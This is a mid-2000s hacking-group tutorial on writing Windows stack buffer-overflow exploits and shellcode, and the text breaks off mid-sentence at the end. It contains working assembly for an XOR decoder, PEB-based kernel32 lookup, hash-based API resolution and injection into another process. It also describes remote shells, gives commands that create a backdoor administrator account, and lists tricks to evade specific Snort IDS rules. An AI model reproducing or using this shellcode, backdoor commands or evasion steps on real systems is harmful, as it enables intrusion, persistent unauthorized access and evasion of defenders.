Uploaded by goodsam

Penetration

advertisement
Smashing the Stack for
Fun and Deception
Jaywalker's No-Nonsense Guide
to Compromise Security
Category: Computer Security
Platform: Microsoft™ Windows©
Level of Difficulty:
1
2
3
This article builds on advanced knowledge of Assembly language and
Microsoft Windows API programming.
There is no knowledge that is not power.
© Master of Disaster Hacking Group 1998-2004, All rights reserved.
Legal Issues:
The author reserves the rights not to be responsible for topicality, correctness, completeness, fitness, or
quality of the information provided in this document.
I disclaim all other warranties and conditions either implied, expressed, or statutory, including, but not
limited to (If any) implied warranties, duties, and responsibility of merchantability, of fitness, for a
particular purpose, of reliability or availability, of accuracy, of completeness, of responses, of results,
of lack of viruses, of lack of damages, and of negligence, all with regard the article and its peripheral
attachments.
The Master of Disaster Hacking Group reserves the right to change or discontinue this document without prior
notice.
1
Table of Contents
Foreword
Introduction.......................................................3
Abstract..............................................................3
Stack Primer
Stack Overview……………………..........................3
Stack Frame........................................................4
Buffer Overflow
Rundown on Buffer Overflow.......................5
General Considerations .................................6
ShellCode
Breakdown of ShellCode ...............................7
Buffer Overrun Mounting ..............................7
Getting your feet wet!
ShellCode Development..................................8
Finding EIP...........................................................8
Decoder ...............................................................8
Locating Kernel32 ............................................9
Pinpointing Functions ....................................10
Migrating to Another Process .....................12
2
Spawning Shell ................................................13
Network Communications …………….….……….14
Avoiding IDS Detection! …………………..………..15
What Goodies Are Along This Article? ………….….16
Closing …….…………………………………………………………16
References ………..………………………………….……………17
Foreword
Introduction
Nowadays computer security seems to be dominating computer science. With
growth of computer's power, the software's and hardware's demands outrun our ability
to keep up with the changes in the field. Security was of no tribulation some time ago
and the masses did not seem to show concern for privacy. But when cyberpunks hit
the streets, new branches of computer science are sprouting up ever since. Among
those are the eminent emergence of cryptography, IDS, enterprise firewalls, and other
security-related technologies. Computers are getting hooked up to the Net evermore
and in the meantime many are oblivious to the dangers involved. There are a lot of
security myths floating around that we believe are often as dangerous as the security
hole at least. One of the myths is that breaching security of Windows™ is much more
difficult than Linux and UNIX systems; the other is that these systems contain more
security-critical vulnerabilities compared with others. We fight these myths tooth and
nail.
What we intend to present is about breaching one of those insecurities that is
commonplace in Windows operating systems. To demonstrate what a real penetration
is like, we also have created a hypothetical vulnerable program and put our attack
tools into practice. This can serve both as a proof of concept and as our effort to fight
one of those myths. This can lead you to believe that an effective attacking tool can be
created for any system.
The widespread outbreak of Win32.Sasser and Blaster viruses is the palpable
testimony to the infamous type of vulnerability, which is the 'buffer overflow'. These
wild malicious codes are able to infect numerous computers at high rate by leveraging
buffer overflows. Buffer overrun can result in application crash or it may have the
3
very destructive effect of code injection. If exploited properly one is able to run its
code of choice.
Abstract
Severe security problems can occur when buffer and memory overflows occur
in applications. I set out to present the details of mounting this type of attacks against
applications. I first give a lowdown on stack and its functions, then proceed to explain
overflow concept and its ramifications on the execution flow of running programs. In
particular we will cover how to write shellcodes to achieve buffer overflow attacks,
and discuss how to pass through firewalls with minimal trace using shellcode and give
the attacker ability to interact with victim's box. Finally we will conclude our
discourse with new methods in buffer overflow prevention technologies and their
shortcomings.
Stack Primer
Stack Overview
Stack is the memory space allocated inside the boundaries of a process's
memory space. Stack is mostly used by a program to dynamically allot memory for
arrays and variables declared inside functions, or to store data temporarily. Another
use of stack is to provide a means to keep track of where to enter and exit procedures.
Stack is also used to pass parameters to procedures. Stack works on a first-in-last-out
basis, that is the first to push on stack is the last to be popped out of it.
In Assembly language stack position is identified by ESP (Extended Stack Pointer),
when a program's execution begins, it starts with ESP pointing to the end of the stack.
Every time a word (double byte) is pushed on stack, ESP will be decreased by 2; in
reverse, when a word is popped out, ESP will be added with 2. That’s to say, next
available position on stack is top of the stack. An important consideration when using
the stack is to be symmetrical in the byte count of what is pushed and what is popped.
If the stack is not balanced on exit from a procedure, program execution begins at the
wrong address which will almost exclusively crash the program. In most instances, if
you push a given data size onto the stack, you must pop the same data size. Our
discussion is focused on Intel 32 bit x86 compatible CPUs, what we present is not
applicable to other CPUs such as Intel's 64 bit Itanium CPUs (IA64) that has 128
general-purpose r-registers plus 128 floating point f-registers, not mentioning the left
8 branching registers! It lends itself to another full-blown book of its own.
Stack Frame
In x86 CPUs, parameters are traditionally passed on stack. A glance at the
assembly code generated for a function call reveals that for each parameter a PUSH
command has been produced. Once all parameters have been pushed on stack, a
CALL command transfers control to the target routine. The CALL instruction pushes
EIP of next command on stack so that it can find where to land after its return from
procedure. The x86 stack frame uses EBP (Extended Base Pointer) to access the
frame. Stack frame is typically set up at the start of procedure by the following code,
known as prologue:
4
PUSH EBP
MOV EBP,ESP
SUB EBP,XX
where xx is the amount of bytes allocated for local variables of routine. Below is a
typical figure of a stack frame:
Bottom of Stack
Higher Memory Addresses
Passed Parameters
Return Address
Previous EBP
EBP
Exception Handler Frame
Top of Stack
Local Parameters
Lower Memory Addresses
Typical Stack Frame
The key point here is that program accesses its parameters via relative addressing
based on EBP. For instance, EBP+0 points to previous stack frame, EBP+4 is the
function's return address. The function's passed parameters are at positive relative
address from EBP. The first parameter is at EBP+8. Other subsequent parameters are
at addresses multiplicative of eight, that is EBP+0xC, 0x10, and so. The function's
local variables will be at negative address from EBP. As usual these rules are apt to be
overturned, many optimized compilers do not push the EBP and access both local and
passes parameters at positive offset from EBP. Moreover some variables can be kept
in registers rather than on stack. Return values are conventionally stored in EAX
register if it is four bytes of less, and if it is eight byte will be returned by EDX:EAX
pair, that is, higher order bytes in EDX and lower order bytes in EAX. As you saw
stack is composed of stack frames that are pushed at function entries and popped at
function exits. As more data are pushed, stack will grow down in memory, but keep in
mind that ESP will always point to top of stack. Stack frames can also be made and
cleaned up by ENTER and LEAVE commands. We did not mention what exception
frame handler is, it is actually used by compilers to catch run-time error, it points to a
structure known as EXCEPTION_REGISTRATION, it is a linked-list of structures
that compilers use to catch exceptions, do you remember the try-except-finally in
programming languages like C++,VB .Net and so? We'll talk more about it here.
Buffer Overflow
Rundown on Buffer Overflow
Now suppose that a function tries to write something on the stack, typically it
will use the space allocated for its local variables to store its needed data. Some string
functions that are mostly peculiar to C++ do not check the string's length properly and
therefore are prone to write past the space allocated for its local parameters. Hence it
is possible in some scenarios that a program can corrupt its stack by writing more data
than allocated. Therefore it can modify value of previous stack frame, returned
address and even the passed parameters. The problem is encountered just as the
5
function returns; when procedures are finished with their job they clean up the stack
frame by releasing the stack space allocated for local variables by the following
epilogue:
ADD ESP,XX
POP EBP
RET
When CPU tries to jump out of procedure by executing the RET instruction, it takes
'Return Address' as the new execution point from the stack and starts running codes at
that location. If the stack had been written with no special plan ahead of time, control
would branch out to location where arbitrary code will run or to a location where it
has no access to touch. In worst-case scenario, the latter one, this can lead to access
violation error and our program will terminate. In former scenario, our code will be
running arbitrarily and no sooner than a few bytes along program will crash, either
because it jumps to an unavailable location or it ends up like the former case.
So far we have learned that stack overflow can seize control of execution or
can rip it to shreds. Nonetheless we intentionally want to cause it, because it
empowers us to rule over the crashed program. The question now boils down to
'How?’.
We must feed the target application with data that has been especially crafted; we set
it so that the return address will land us to the location of our choice. Thus we are able
to grab control and force the overrun program to execute location we want. This
location is the place where our program overflew the stack. In other words, we inject
runnable code on stack, this way our code finds a chance to run after the buffer
overflow hit.
General Considerations
Thus far you must have been familiar with concept of this kind of attack. Now
to recap, we inject assembly opcodes plus return address into program, when it copies
this unusually large data on stack we have the return address replaced by our own,
upon return the return address places us in middle of data on stack, that is, our code,
and our crafted code assume power this minute. The code that will get a piggy back
ride on the crashed program is called 'payload', if payload spawns a shell it is called a
'shellcode'. Shellcodes are written in assembly language and then compiled; the .text
part of the resulted PE file is then extracted to form the runnable part of shellcode.
What to consider in a buffer overflow attack?
Our shellcode must conform to the protocol by which it is being transferred.
Return address must be so that it jumps right on shellcode, so we find an
opportunity to run our injected shellcode.
Having a robust shellcode is a must.
Now the solution to each question posed:
1. Some protocols cause further constraints for us, for example, it may not accept
any zero characters or other special characters, so we must write a shellcode
that does not contain any zero character. To overcome this issue we encode
our shellcode and append a small decoder at the beginning so that it can be
decoded before running. The best encode-decode scheme is xor-encoding it
with a byte, so the decoder and encoder will be the same. If shellcode is
6
transferred by TCP or UDP protocols we are at the mercy of the target
program; some programs do not accept special characters especially zeros.
2. Running processes almost start execution at addresses like 0x0040000 or so,
this causes further problem for us since every instruction in code will be
around this number. The trouble with this number is that it contains two zeros
before the four. Suppose that a console application is our target, and we need
to feed the return address, because it has two zeros before four we can not key
it in. This problem can be overcome with ease. We look up the name of
dependencies an application loads at startup. By knowing the context of target
at which it is running at the time of exploit, we can proceed and see what
registers point roughly to our shellcode, choose one, if there is nothing other
that ESP, we choose it. Then search each dependency and look for a 'JMP
ESP'(in hex code it is 'FFE4') or 'CALL ESP'(in hex code 'FFD4'). Program's
dependencies like ntdll.dll, kernel32.dll, user32.dll,... will be loaded at some
prediefined base addresses,for example in WinXP SP1 in kernel32.dll at
address 0x77E6FA88 there is 'jmp eax'. We set the return address to this value,
so when function is returned it will jump at this address in kernel32.dll, and
this jump places us at shellcode. So shellcode will get to run at this stage.
3. Shellcode must be robust, that is we have no idea of where exactly our
shellcode will start running. If we need to call API functions we need to know
where in memory we are, at what address kernel32 base address is, and so
forth. Shellcode must also be relocatable, that is, able to run anywhere in
memory such as heap, stack or data segment. To overcome this we use relative
addressing feature of assembly language.
ShellCode
Breakdown of ShellCode
Exploit consists of two major components:
1. Exploitation technique and 2. Payload
Objective of payload is to divert execution path of vulnerable program. We can achive
this via a variety of methods:
Stack-based Buffer Overflow
Heap-based Buffer Overflow
Format String
Integer Overflow
Memory Corruption
Each vulnerability has different methods to trigger. Yet shellcode can be written to be
reused. The code of our choice or payload can theoretically do anything on the target
computer under the security context of the vulnerable program. If the target program
is a system service, payload can take full control of system without any limitation.
Shellcodes can give attacker an interactive command prompt to further his cause. The
attacker may explore the target system to discover network structure, to penetrate
other vulnerable systems. A simple 'net veiw /domain' reveals a lot of facts. Shell may
also allow attacker to upload or download files, install trojans or backdoors, keylogger
or sniffer, Enterprise worm or rootkits(special hacking tools that gives full anonymity
in system even at kernel-mode level, attacker can cover his tracks and hides his trails
through the system by rootkits). Shellcode can also wait for commands from attacker.
7
Buffer Overrun Mounting
Payload is comprised of a sequence of codes. First we put a prologue; it can be
a xor-decoder or some other garbage code. Why garbage? That's because sometimes
the return address will put us somewhere in the middle of our payload. Taking this
into account, we must put several NOPs before the decoder; NOP opcode is 0x90, so
the beginning of many shellcodes is full of 90's. After the shellcode we place the
return address (to a jump instruction in kernel32 of ntdll) so that when execution
diverts, it puts us back in shellcode. The smashed stack must look like the following
after payload overwriting it:
90909090909090909090
90909090909090909099
Execution is
Xor-Decoder
diverted to our
shellcode
ShellCode
modified return address
Stack of target
JMP ESP or so
Kernel32 or other dependencies of target
Smashed Stack
Some C++ funcions like strcpy, wcscpy, scanf ,... and a couple of API functions like
lstrcat,lstrcpy,lstrlen,wsprintf, GetAtomName,LoadString, GetMenuString are subject
to buffer overrun attacks. That's all because these functions do not check string length
properly and just copy string from source to destination.
Getting your feet wet!
ShellCode Development
While each vulnerability has different method to exploit, the shellcode can be
written to be flexible and usable. In Microsoft Windows, shellcode must first find its
location in memory and attempts to decode its executable part. Then it should find
kernel32 base address to run its necessary API functions.
Finding EIP
Assembly language has no instruction to retrieve EIP, however during run of
applications EIP keeps changing when CPU executes opcodes. Knowing that CALL
instruction change EIP and make a copy of it on stack, we can proceed to find EIP
easily as follows:
CALL $+2 ; use relative addressing to jump at next instruction
POP ESI ; ESI will contain current EIP
The CALL instruction will divert execution flow to next instruction (POP ESI) and
stores EIP on stack, next opcode pops EIP out of stack and put it into ESI.
8
Decoder
Decoder uses a simple algorithm, just reverse process of encoder. Encoder
Xors each byte with a predefined byte and add it with one, so for decoding we first
subtract it from one and then Xor it with the same predefined value. Following show
snippet of code that both finds the location shellcode where decoder must start its job
and decode it afterward:
pXore
pXore
Proc
CLD
JMP $ + 24
POP ESI
PUSH ESI
MOV EDI , ESI
XOR ECX , ECX
MOV CX , 0123h
LODSB
SUB AL , 1
; Clear direction falg, so string operations will increase both EDI and ESI
; Jump at 'CALL $ - 22'
; Pops EIP, EIP will exactly point to location of opcodes just after 'CALL $ - 22'
; Save a copy of ESI
; Means both source and destination of string operation point to encoded opcodes
; Zero out ECX and get ready for loop
; 0123h depends on length of encoded shellcode
; Load one byte of encoded shellcode and put into AL
; Subtract from one
XOR AL , 0F6h
; Xor result with predefined byte
STOSB
LOOP $ - 6
JMP $ + 4
CALL $ - 22
Endp
; Store decoded shellcode back to its original location
; Loop back to LODSB
; Jump at the decoded shellcode and run it smoothly
; CALL the instruction 'POP ESI'
I hope the above code is self-explanatory.
Locating Kernel32
To execute API function one must use LoadLibrary and GetProcAddress,
but using these functions require knowledge of their location in memory. I present a
global method for locating kernel32 in memory that is independent of system
platform. Answer lies in TEB (Thread Environment Block), it is a special structure
present in memory space of each thread running in Windows. Though an
undocumented structure, it has been reverse engineered and its source is widely
published. TEB is located at address FS:[2Ch] of each thread. It contains all sort of
information including environment pointer, active RPC info, PEB, last error code,
thread info, thread locale, execption code, GDI pen, brush, region, TLS location, stack
commit max and so forth. As a matter of fact FS is one important register for every
thread in Windows, to say the least, FS:[00] points to SEH (Structured Exception
Handling), FS:[04h] to stack user top, FS:[08h] to stack user base, FS:[10h] to fiber
data field, FS:[20h] to process ID, FS:[24h] to thread ID, respectively. Among these
fields, at offset 30h of TEB we can find PEB(Process Environment Block). PEB is
neither documented in SDK nor in DDk, but can be viewed by a kernel-mode
debugger like windbg. At offset 0Ch of PEB we reach LoaderData, it is a handle to
another structure called PEB_LDR_DATA.
9
typedef struct _TEB {
NT_TIB
Tib;
PVOID
EnvironmentPointer;
CLIENT_ID
Cid;
PVOID
ActiveRpcInfo;
PVOID
ThreadLocalStoragePointer;
PPEB
Peb;
ULONG
LastErrorValue;
ULONG
CountOfOwnedCriticalSections
...
PVOID
StackCommit;
PVOID
StackCommitMax;
PVOID
StackReserved;
} TEB, *PTEB;
typedef struct _PEB {
BOOLEAN
InheritedAddressSpace;
BOOLEAN
ReadImageFileExecOptions;
BOOLEAN
BeingDebugged;
BOOLEAN
Spare;
HANDLE
Mutant;
PVOID
ImageBaseAddress;
PPEB_LDR_DATA LoaderData;
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
PVOID
SubSystemData;
...
ULONG
TlsExpansionBitmap;
BYTE
TlsExpansionBitmapBits[0x80];
ULONG
SessionId;
} PEB, *PPEB;
typedef struct _PEB_LDR_DATA {
ULONG
Length;
BOOLEAN
Initialized;
PVOID
SsHandle;
LIST_ENTRY
InLoadOrderModuleList;
LIST_ENTRY
InMemoryOrderModuleList;
LIST_ENTRY
InInitializationOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;
struct LIST_ENTRY{
struct LIST_ENTRY* Flink;
struct LIST_ENTRY* Blink;
};
As you see, PEB_LDR_DATA has a member called InInitializationOrderModuleList
that is structure of LIST_ENTRY type at offset 1Ch, this structure is a linked list that
has information about every module loaded by process. By walking down this list we
reach the second entry that is pointer to base address of kernel32. The first entry is a
pointer to ntdll. Following is the equivalent aseembly code that puts base address of
kernel32 in EDX:
LocateKernel
Proc
assume fs:nothing
mov eax,fs:[30h]
mov eax,[eax+0Ch]
mov esi,[eax+1Ch]
lodsd
mov edx,[eax+8h]
LocateKernel
Endp
;Remove any assembler's prior assumtions from fs
;Get pointer to PEB structure at offset 30h in TEB
;Get PEB_LDR_DATA
;Get InInitializionOrderModuleList in PEB_LDR_DATA
;Load dword from ds:[esi] into eax
;Get second entry on table, that is kernel32
FS register
PEB
TEB
30
PEB_LDR_DATA
1C
0C
ntdll
LIST_ENTRY
kernel32
other modules
Schematic of our procedure
10
other modules
Pinpointing Functions
Having found base of kernel32 we have no problem retrieving our desired API
functions from it. Since PE files in memory has very similar structure to their format
on hard disk, and its format is well documented we can find the function pointer we
need. From SDK documentation, each PE file starts with a IMAGE_DOS_HEADER
followed by a MS-DOS stub, IMAGE_NT_HEADERS, IMAGE_FILE_HEADER,
IMAGE_OPTIONAL_HEADER and then PE sections succeed them all.
At offset 3Ch of IMAGE_DOS_HEADER (first header), there is a pointer to
IMAGE_NT_HEADERS. At offset 78h of this structure we find the pointer to the first
DataDirectory, this first entry is a pointer to IMAGE_EXPORT_DIRECTORY, the
second is to IMAGE_IMPORT_DIRECTORY. By having this structure we can find a
pointer to AddressOfFunctions that leads to all the RVA (Relative Virtual Address,
that is, relative to base of image) of exported function by kernel32. So to find location
of a function exported by kernel32, we obtain a hashed value for it to save space, and
at run-time compute hash of names of function(pointed to by AddressOfNames) and
compare it with our own hash, if they're the same we are positive that we have found
the address of right function. The hash function is simple algorithm based on sum and
rotation. Following is the complete GetProcAddress for finding address of every
function, given that EDX is the base address of kernel32 and ECX has hash of
function name.
GetProcAdd
Proc
;Simulated GetProcAddress, it looks for signature of function in module export table
cld
;Clear Direction Flag , makes esi,edi to increment after string instructions.
mov esi,edx
;EDX = module base address
;see "PE format.txt" for details of PE file formats
movzx ebx,word ptr [esi+3Ch] ;Retrieve pointer to IMAGE_NT_HEADERS, located just after
IMAGE_DOS_HEADER
mov esi,[esi+ebx+78h]
;load first RVA IMAGE_NT_HEADERS.IMAGE_OPTIONAL_HEADER.DATADIRECTOR[0].VirtualAddress
lea esi,[edx+esi+1Ch]
;The first element of array is always the address and size of the exported function table.
;The second array entry is the address and size of the imported function table.
;1Ch=((IMAGE_EXPORT_DIRECTORY *)VirtualAddress)->AddressOfFunctions
lodsd
;load function table address
add eax,edx
;RVA to VA
push eax
;Save function table address
lodsd
;Address of names, also esi is incremented
add eax,edx
;RVA to VA
push eax
;Save address of names
lodsd
;Address of ordinals
add eax,edx
;RVA to VA
pop ebx
;ebx=address of names
push eax
;Save address of ordinals
xor eax,eax
;Index
i1:
mov esi,[4*eax+ebx] ;Pointer to address of exported function names
add esi,edx
;RVA to VA; at first run, esi is pointing to the name of ActivateActCtx(1st kernel32 func name!!!)
and so forth.
push eax
push ebx
xor ebx,ebx
i2:
xor eax,eax
lodsb
;Load byte at eax, it is actually the current character at that
rol ebx,5
;Rotate 5 bit to right
add ebx,eax
cmp eax,0
jnz i2
;Go on if we have not yet reached end of the string
ror ebx,5
cmp ebx,ecx
;Compare hashes
pop ebx
pop eax
je i3
;Function found
inc eax
jmp i1
;Try next function
i3:
pop ebx
11
movzx esi,word ptr [ebx+2*eax]
pop eax
mov esi,[eax+esi*4]
add esi,edx
ret
GetProcAdd
Endp
;Get index out of ordinals table, note that ordinal is 2 bytes
;Get function address in memory from "address of names table"
;RVA to RV
;We managed to finagle the function address and put it into esi!
The above code is basically simple if you read it thoroughly; it does the same job as
GetProcAddress in Windows API. To recap, it first retrieves a pointer to Export Table
of kernel, and from there it finds AddressOfOrdinals, AddressOfNames and traverses
down the list of function names, hashing each name and comparing it with value of
our own hash at ECX, if the two match, we have reached the correct function. At this
time we can just sit back and have every function you fancy run at will, it is a simple
matter for our shellcode now to start its job on the attacked system and enjoy itself.
For example if you want to call the function GetSystemDirectory from kernel and
discover the path to system directory from shellcode just hash the real name of
function in kernel32, which is GetSystemDirectoryA. The result of hashing will be
Module Image
AACCFB39h,
so follwing code will run smoothly the function:
Image Export Directory
MOV ECX , 0AACCFB39h
CALL LocateKernel
CALL GetProcAddr
CALL ESI
; Put hash of GetSystemDirectoryA in ECX
; Find base address of kernel32
; Find address of function in memory and put it into ESI
; Calling ESI is equivalent to calling the function directly!
0
IMAGE-DOS-HEADER
MS-DOS Stub Program
Data Directory
IMAGE-NT-HEADERS
1C
IMAGE-OPTIONAL-HEADER
Section header 1
Names
Section header 2
Ordinals
Functions
.....
Section 1
GetSystemDirectory
Section 2
.....
Address
Schematic View of Algorithm
Migrating to Another Process
After a vulnerable service is attacked, chances are the system become
unstable, it may even crash and makes user notice suspicious activity, or the attack
may even bring down the whole system altogether or in worst-case scenario the
attacked service may have one of its threads generate error and terminate itself
12
unexpectedly, so our shellcode bacomes orphan. Otherwise AVP or IDS systems may
detect this attack and crash dump may be left on system with our track in memory. To
avoid this problem, shellcode must immediately migrate into another process and
safely connect back to attacker and allow him to further explore the system
interactively. There is no equivalent of process forking as is in Unix or Linux. LSD
proposed their method regarding process forking, but I could not get it to work, so I
forged ahead with my own.
To migrate into memory space of another process, we first create an arbitrary
process in memory using CreatProcess(), my choice is cmd.exe, and put it into
suspended mode, so it does not start running until we signal it. Next allocate enough
memory inside the suspended process using VirtualAllocEx(), copy your shellcode in
the allocated memory by WriteProcessMemory(), finally create a remote thread inside
it using CreateRemoteThread(), note that you must set the thread base address to the
base address of allocated memory. This is a very robust, safe and flexible method to
move into another process.
pFork
proc
local
pPI[15]:BYTE
local
pSI[16]:DWORD
local
Base:DWORD
jmp tFork
align 4
; 16 bytes, process info structure
; 68 bytes, startup info structure
dFork:
db
db
"Remote Shell by NiTro",0
"cmd",0
tFork:
mov ecx,16
.REPEAT
mov pSI[ecx],0 ; Zero out the structure
.UNTILCXZ
mov eax,offset dFork
mov pSI[0],68
;cb, size of structure
mov pSI[0+3*4],eax ;lpTitle
lea eax,pPI[0]
push eax
;lpProcessInformation
lea eax,pSI[0]
push eax
;lpStartupInfo
push 0
;lpCurrecntDirectory=NULL
push 0
;lpEnvironment=NULL
push 4h
;dwCreationFlags=CREATE_SUSPENDED
push 0
;bInheritHandles=FALSE
push 0
;lpThreadAttributes=NULL
push 0
;lpProcessAttributes=NULL
mov eax,offset dFork+22
; Offset of "cmd"
push eax
;lpCommandLine="cmd"
push 0
;lpApplicationName=NULL
call LocateKernel
mov ecx,0B87742CBh
;Hash of CreateProcessA
call GetProcAdd
;Find location of CreateProcessA in kernel32
call esi
;Invoke CreateProcessA
push 40h
;PAGE_EXECUTE_READWRITE
push 1000h
;MEM_COMMIT
push 5000h
;20kb
push 0
;Start at address zero(means do not care)
lea eax,pPI[0]
;hProcess(By value)
push [eax]
call LocateKernel
mov ecx,0E9D81A3Bh
;Hash of VirtualAllocEx
call GetProcAdd
;Find location of VirtualAllocEx in kernel32
call esi
;Allocate memory in the new process
mov Base,eax
;ebx=base address of the allocated region of pages
mov ecx,offset pDummy
; Base address of our shellcode to be moved into new process
push 0
push 800h
;Write 2k memory
push ecx
;lpBuffer
push eax
;lpBaseAddress, base address indicated by VirtualAllocEx
lea eax,pPI[0]
push [eax]
;hProcess(By value)
call LocateKernel
13
mov ecx,0A6A6793Dh
call GetProcAdd
call esi
lea edi,pPI[4]
push [edi]
call LocateKernel
mov ecx,0195D7906h
call GetProcAdd
;call esi
pFork
push 0
push 4h
push 0
push Base
push 800h
push 0
lea eax,pPI[0]
push [eax]
call LocateKernel
mov ecx,07231F46Ch
call GetProcAdd
call esi
push eax
call LocateKernel
mov ecx,0195D7906h
call GetProcAdd
call esi
ret
endp
;Hash of WriteProcessMemory
;Find location of WriteProcessMemory in kernel32
;Write memory in the new process
;hThread(By value)
;Hash of ResumeThread
;Find location of ResumeThread in kernel32
;Invoke ResumeThread
;lpThreadId
;dwCreationFlags=CREATE_SUSPENDED
;lpParameter
;lpStartAddress
;dwStackSize
;lpThreadAttributes
;hProcess(By value)
;Hash of CreateRemoteThread
;Push hThread on stack
;Hash of ResumeThread
;Find location of ResumeThread in kernel32
;Invoke ResumeThread
Spawning Shell
Now comes the salient part. Spawning shell will make attacker's day! Attacker
wants to remotely and interactively work on shell and do his dirty work on victim's
box. To perform this action we use CreateProcess() function to execute an instance of
command interpreter, but with redirected standard input, output and error assigned to
anonymous pipes(using CreatePipe()), and transmit data between attacker and shell
using sockets. In this mechanism, we perform blocked reading of socket and retrieve
revieved data and put in the stdin of cmd as input for processing, then use Sleep() to
wait for the cmd to properly handle command execution, next use PeekNamedPipe()
in a non-block way to check if any data is to be read from stdout or stderr. If any, we
can send back the result using socket to the attacker. At this stage, our shellcode will
wait for data on socket.Unfortunately, if any data arrive at stdout or stderr at this time;
they will not be read until next command from attacker is received from socket.
There is however a better solution that does not have this disadvantage. In this case a
direct handle to the network socket is used (created using WSASocket()) instead of
anonymous pipes. The command interperter will directly reads/writes to/ or from the
socket directly while shellcode waits for its termination using WaitForSingleObject().
Yet this method has another disadvantage, if the command interpreter hangs in the
meantime, shellcode will be blocked indefinitely and attacker practically has no
choice to re-establish connection with victim. LSD proposed much complex but
elegant and more prudent synchronization method for this problem. In Microsoft
Windows WaitForMultipleObjects() is used for synchronization of objects. The
function waits for any of several functions to be signaled and return the object causing
this signal. It can handle change notification, console input, event, job, mutex,
semaphore, process, thread, waitable timer. It is evident that this function can
notdoes not allow dirrect monitoring of socket and outputs from console applications.
However it can be achieved using event objects. The only way to associate an event
with a pipe handler is to use overlapped mode. To do this, we create an event through
CreateEvent() function and use the handle to this event as argument to ReadFile()
14
operation. This allow the calling process to resume execution with no blocking, if the
function is pending, wait functions will return non-signaled status.Upon finish, the
application can get result of operation by GetOverlappedResult() function. In this
procedure we must use named pipes instead of anonymous pipes. Synchronization
with socket objects can be accomplished using WSACreateEvent() function.
Association with event object can be made by using WSAEventSelect(), notice that
this function puts the socket to non-blocking mode. After this, socket handles can be
used as input for WaitForMultipleObjects(). When this function alerts us, we can use
WSAEnumNetworkEvents() to discover occurrence of our desired event. To set the
socket back to blocking mode IOCtlSsocket() must be called.
Network Communications
Every shellcode must eventually interact with attacker, giving him use of executing
commands on victim’s box. On Microsoft Windows applications must leverage
Winsock API to interface with network protocols and communicate with the other
party. To initialize Winsock library one must first call WSAStartup() function to
initiate ws2_32.dll in process. The process can take three different methods to
complete the process of communication. First one is to create a socket, bind to a port,
listen to incoming connection and accept the newly created socket. Through this
method attacker can establish connection to a known port on victim’s machine and
handle communication with shellcode. It’s also very convenient to create multiple
connections with shellcode. But the downside is that sometimes there is not a faint
chance of this job. Chances are the server is protected by corporate firewalls and tight
security configurations which only allow connection through port 80(http) and in rare
case of a vulnerability in www server, it does not allow outbound connection on other
ports other some well-known and already used ports, even if a successful exploitation
of security hole is achieved. Only solution for this case is a familiarity of the specific
firewall settings and using those ports for attack.
In second scenario, shellcode creates a backward connection to the external system
from which the attack had been initiated. In this sense, shellcode does not need to
bind and wait on a port, but it tries to periodically connect to attacker’s machine via
the port from which attack was conducted.
Third scenario is innovated by LSD. In this method shellcode walks through the
process handler table and search for a socket handler of remote TCP endpoint
identified by the given source port. GetPeerName() function is used to get
information, IP address and port number, about the second side of connection. This
found information is reused to communicate with attacker. Note that this method does
not leave any further trace on the compromised system’s IDS or firewall. Even if the
port is already in use you can bind to this port by setting the SO_REUSEADDR flag
with a call to setsockopt() function. Given the process that uses the port has set SO_
EXCLUSIVEADDRUSE option on port, this method will fail. But Phrack suggested
to terminate the process owning the port and take over it entirely. To forcefully
terminate the process TerminateProcess() function is called. This function needs the
handle to the process, but our shellcode reside in memory address of the same
vulnerable service and ending the service will mean end of our shellcode. Now comes
importance of process forking to mind, we jettison shellcode out of vulnerable process
and before running it terminate the service by passing -1 as the handle to the current
process to TerminateProcess() function. If it is needed we can restart the vulnerable
service by a variety of methods, for example if it is IIS, we can use TaskScheduler
15
command like “at <time> iisreset”, if it is the SQL service we can use “net start
sqlserveragent”, and so forth.
All said and done, you can always feed cmd with command line options that will
execute the desired actions on the compromised system and then the shellcode can
die. For example the following commands will create a new user on the vulnerable
system as an administrator:
cmd /c net user /add compaquser compaqpass
cmd /c net localgroup /add administrators compaquser
Through the establishment of a connection with the attacker, he can even upload or
download files on/from the victim’s machine. This is necessary as a portion of full
penetration test. Hence attacker can install backdoors to maintain access on machine
or steal sensitive information from it. File upload/download can be easily performed
by just opening a file by CreatFile(), reading/writing data from/to port and
writing/reading it to file using WriteFile()/ReadFile() functions respectively.
Avoiding IDS Detection!
Snort is a free, yet formidable, IDS tool that has over thousands of rules for detecting
attack possibilities. It works on the basis of examining captured packets; whenever a
criterion is met it takes appropriate action for defense. Every time a cmd is started, it
will display:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\...>
Snort rule number 2123 captures this banner, we can easily suppress this by using
“cmd /k”.
There is also another rule(6622) that captures directory listing result of “dir”, if a
match is hit, it trigger an alert.
dir
Volume in drive C is Cool
Volume Serial Number is SKSK-6622
To avoid this we can use “/b” with dir command. It’s always best to use the following
command to permanently put this option in effect:
Set dircmd=/b
Snort also has signature that detect "Command completed". This command usually
generated by the "net" command. It is easy to create a wrapper for the net command
that will not display "Command completed" status or use other tools like "nbtdump",
etc.
What goodies are along with this article!
In this section we talk about the package that is along with this article. As proof of
concept I have included MOD.asm file as source to assembly code that contains core
functions for shellcode. It is able to self-decode, fork itself, shutdown the parent
process, start socket function in new process, wait for connection from binding to port
and spawn shell. After a successful connection has been made on port 4660 of the
victim’s machine, attacker is given a shell that can execute commands and let him
upload or download files on server. Use Nitro.exe to establish this connection with
victim’s box. It is only enough to specify the IP address of victim’s computer to make
the connection. To show how a real exploit may be used against a vulnerable
16
application I have also included Smash.exe that has a vulnerable function, when
exploited by stuffing more data on stack it will crash and the shellcode will have a
chance to run. You may perform all these tests on your machine. First run smash.exe
and press any key to crash, it does all this internally. Afterward shellcode is in
memory waiting for connection on port 4660, use Nitro.exe to make connection to
your own machine (127.0.0.1) and try the shellcode!
MOD.asm can be compiled using MASM from www.masm32.com, the result is an
executable called MOD.exe, notice that it can not run independently. To extract the
actual code part of this executable, that is, apart from unneeded sections of COFF
files, I have wrote a program called AsmTools.exe that can extract the .Text part of
PE files. To use it just open the MOD.exe file by pressing “Extract OpCode” button, it
copies the contents of this file to clipboard, on next tab, encode, check the “encode
shellcode”, this will automatically encode the appropriate parts of asm codes. On last
tab, Section, press “Extract Sections” and then “Put on clipboard”, this will put the
extracted opcode in hexadecimal on clipboard, it is now ready to be put in your C++
programs! The generated hex codes often end with a series of similar characters,
